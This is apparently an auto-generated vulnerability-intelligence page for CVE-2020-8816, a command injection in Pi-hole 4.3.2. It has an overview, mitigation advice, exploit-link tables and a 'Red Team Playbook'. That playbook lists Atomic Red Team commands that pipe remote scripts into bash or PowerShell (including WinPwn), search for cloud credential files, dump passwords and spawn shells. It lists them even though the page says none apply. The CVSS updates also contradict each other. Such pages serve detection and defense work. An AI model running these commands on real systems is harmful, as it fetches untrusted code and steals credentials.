CVE-2020-8816
Overview
This vulnerability is a command injection flaw arising from insufficient input validation in the DHCP static lease configuration feature of Pi-hole Web AdminLTE v4.3.2. The issue occurs when privileged dashboard users submit crafted DHCP static lease entries containing malicious shell commands. The affected component is the DHCP static lease processing functionality within the web administration interface, which improperly sanitizes user-supplied input before executing system commands.
Vulnerability Description
Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.
Impact
An attacker with privileged dashboard access can execute arbitrary system commands on the underlying host, potentially leading to full system compromise. This includes the ability to manipulate system files, install malware, or pivot within the network environment. The prerequisite is authenticated access with sufficient privileges to modify DHCP static leases, which may be granted to network administrators or trusted users. Successful exploitation can result in unauthorized control over the Pi-hole server and disruption of network services or data confidentiality breaches.
Solution
Upgrade Pi-hole to a version later than 4.3.2 where this vulnerability is addressed, as documented in the official GitHub repository commits. Refer to the Pi-hole AdminLTE project updates at https://github.com/pi-hole/AdminLTE/commits/master for patched releases. Additionally, consult the advisory details at Packet Storm Security (http://packetstormsecurity.com/files/157861/Pi-Hole-4.3.2-DHCP-MAC-OS-Command-Execution.html) for mitigation guidance. No vendor advisory ID is specified; follow the vendor’s recommended upgrade path to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Pi-hole web interface, specifically in version 4.3.2 of AdminLTE, presents a significant risk due to its potential for remote code execution. This flaw arises from improper handling of DHCP static leases by privileged dashboard users, allowing an attacker with access to the dashboard to craft malicious input that can be executed on the server. The underlying issue lies in the lack of adequate input validation and sanitization, which enables the execution of arbitrary commands. This type of vulnerability is particularly concerning as it can be exploited without requiring physical access to the device, making it accessible to remote attackers who can gain control over the system.
Attack vectors for this vulnerability are primarily focused on the administrative interface of the Pi-hole application. An attacker who has gained access to the dashboard—whether through stolen credentials, phishing, or exploiting other vulnerabilities—can manipulate DHCP settings. By crafting a malicious static lease entry, the attacker can inject harmful payloads that the system will execute. This could lead to a variety of malicious activities, such as data exfiltration, unauthorized access to sensitive information, or even the installation of additional malware. The ease of exploitation, combined with the potential for severe consequences, makes this vulnerability particularly dangerous.
In terms of real-world impact, the business risks associated with this vulnerability are substantial. Organizations relying on Pi-hole for network-wide ad blocking and privacy may find themselves exposed to significant threats if this vulnerability is exploited. The consequences could include data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, the ability to execute arbitrary code on a server could allow attackers to pivot to other systems within the network, escalating the impact beyond the initial compromise. This highlights the importance of securing administrative interfaces and ensuring that only authorized personnel have access.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Pi-hole software to the latest version is crucial, as updates often include patches for known vulnerabilities. Additionally, organizations should enforce strong authentication mechanisms for the dashboard, such as two-factor authentication, to reduce the risk of unauthorized access. Monitoring logs for unusual activity, particularly around DHCP settings, can help in early detection of exploitation attempts. Network segmentation can also limit the potential impact of a successful attack, isolating critical systems from those that are less secure.
In conclusion, the vulnerability in the Pi-hole web interface underscores the critical need for robust security practices in managing administrative tools. The combination of remote code execution capabilities and the potential for significant business impact necessitates a proactive approach to security. By understanding the technical details, potential attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability. Continuous vigilance and adherence to best practices in cybersecurity will be essential in safeguarding against such threats.
The CVSS score adjustment from 7.2 to 9.1 for CVE-2020-8816 reflects a reassessment that underscores the vulnerability’s criticality, primarily due to its potential for authenticated remote code execution within the Pi-hole AdminLTE dashboard. This recalibration aligns with emerging evidence from CSURFACE threat intelligence indicating sustained availability of multiple proof-of-concept exploits, which have maintained stable traction in attacker communities. Although ransomware usage linked to this vulnerability remains unconfirmed, the elevated CVSS score signals a heightened risk profile that demands increased vigilance. Our telemetry shows continued interest from threat actors in leveraging this vulnerability, emphasizing that defenders must prioritize detection capabilities for authenticated exploit attempts. The updated risk level now categorizes CVE-2020-8816 as a critical threat, reflecting its capacity to facilitate significant compromise in environments where privileged dashboard access is attainable.
Update 2 — July 12, 2026
Recent updates to CVE-2020-8816 reveal a downward adjustment in the CVSS score from 9.1 to 7.2, reflecting a refined understanding of the vulnerability’s exploitability and impact. Despite this reduction, the EPSS score has marginally increased, indicating a slight uptick in the probability of exploitation in the wild. CSURFACE threat intelligence notes that new proof-of-concept exploits continue to surface on public platforms, demonstrating sustained attacker interest and the availability of tools that lower the barrier for exploitation by privileged users. Our telemetry confirms a stable but persistent presence of activity targeting this vulnerability, with no clear evidence linking it to ransomware campaigns at this time. The recalibrated CVSS score suggests a moderated but still significant risk, emphasizing that while the vulnerability may not be as severe as initially assessed, it remains a critical concern for environments where privileged dashboard access is possible. Defenders should maintain vigilant monitoring for authenticated exploit attempts, as the evolving exploit landscape underscores ongoing adversary engagement.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Pi-Hole | Pi-Hole | All |
cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Pi-Hole DHCP MAC OS Command Execution
exploits/unix/http/pihole_dhcp_mac_exec
|
h00die, François Renaud-Philippon <[email protected]> | Unknown | unix | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Pi-hole 4.3.2 - Remote Code Execution (Authenticated) | Luis Vacacas | webapps | python | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
AndreyRainchik/CVE-2020-8816
A Python script to exploit CVE-2020-8816, a remote code execution vulnerability on the Pi-hole
|
AndreyRainchik | 10 | 6 | 2020-05-10 | View |
|
cybervaca/CVE-2020-8816
Pi-hole Remote Code Execution authenticated Version >= 4.3.2
|
cybervaca | 11 | 2 | 2020-08-04 | View |
|
team0se7en/CVE-2020-8816
Pi-hole ( <= 4.3.2) authenticated remote code execution.
|
team0se7en | 6 | 0 | 2020-08-06 | View |
|
martinsohn/CVE-2020-8816
A PoC for CVE-2020-8816 that does not use $PATH but $PWD and globbing
|
martinsohn | 1 | 1 | 2020-06-15 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
41%
|
High | High | |
| CAPEC-6 | Argument Injection |
40%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.